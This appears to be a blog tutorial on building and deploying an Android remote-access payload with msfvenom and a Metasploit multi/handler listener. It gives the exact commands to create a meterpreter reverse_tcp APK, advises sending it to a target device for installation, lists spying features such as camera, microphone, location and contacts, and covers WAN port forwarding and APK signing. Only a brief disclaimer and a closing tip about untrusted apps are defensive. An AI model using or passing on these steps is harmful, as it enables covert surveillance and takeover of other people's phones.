Hack Android with MSFvenom

 

How To Hack android devices ?

This post will teach you how to hack android devices to Control them Remotely.Now days every single person uses android device, people love and easily attract to android device because of its features and functionality but. There are soo many third party spy software’s in market but some of them are fake and some of them not works properly.But today i will show you how to hack android device remotely.
But please remember don’t use it as illegally to exploit someone privacy who not belongs to you….

What actually are we doing:

Prerequisites :

  1. A PC or Laptop running on Linux Operating System
  2. Active Internet Connection
  3. An Android device to exploit

Features of this HACK :

  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • And lots more …

Now let’s get to work :

Step1 : Open the terminal in Linux , type the below code and press enter.

ifconfig => to see your ip

 

 

 

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=5454 R >/root/hack.apk

-p => Specify Payload
LHOST => Your IP* or DDNS
LPORT => Port You want to listen on
R => Means RAW Format
>/root/hack.apk => Location for File

 

 

Step2 : Now go to the home folder.

Find your newly created deploy application hack.apk will be automatically generated.

Step3 : Now open the listener by opening another terminal and type the folowing code.

msfconsole

( Now metasploit is loading… it will take some time. )

Step4 : When metasploit successfully loaded type the below code.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.XXX.XXX (the same ip address you entered in step1).

set LPORT XXXX (the same port you used in step1).

exploit

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Now the console starts listening to 192.168.xxx.xxx at port your_port.

Step5 : Now send the hack.apk from home folder to the target android device.

Step6 : Install the hack.apk on the target device and when the device is connected to the internet open the app.

Step7 : As soon as you open the app in the device, you can see the connected device in terminal.

Step8  : Now you have full access to the device from the terminal. Just type help or and you will see list of  all the available commands.

Note : some of you got errors like starting to 0.0.0.0 at port 8080 something like this, it means you are trying to use your dynamic ip ( and your router is DHCP enabled ) ,and this tutorial will works only on your lan network.

1) HOW TO HACK ON WAN (NOT ON YOUR OWN WIFI/NETWORK)*

It’s really easy and almost the same.
First You Need to get your public IP. You can find that from THIS WEBSITE.
You also need your private ip. Use ifconfig command in terminal to get that.
Now There are just two small changes in the above steps

  • In the msfvenom command, in LHOST, you need to enter your “PUBLIC IP
  • When creating a listener/handler, in LHOST, you need to enter your “PRIVATE IP

NOTE – You Need To Port forward The Port you used in your modem/router or it won’t work.

2) Apk File made from msfvenom is 0 kb

That means you have some spelling or syntax error. Please recheck the command you entered, if it’s correct, recheck again!!

3) In Phone – Cannot Parse Package

Try Another File Manager, Download a free one from Google Store!!

4) In Phone – App Not Installed

You May Need to Build an unsigned APK and sign it manually Sign Your APK file, newer android versions may give error.

How to save yourself form these type of hacks :

From this tutorial you may have understood how easy it is to hack android devices.
So to protect your self from being hacked you should check the app thoroughly before installing it.
Try to avoid unknown apps.check it’s publisher or developer.
Install trusted developer apps only…

 

Loading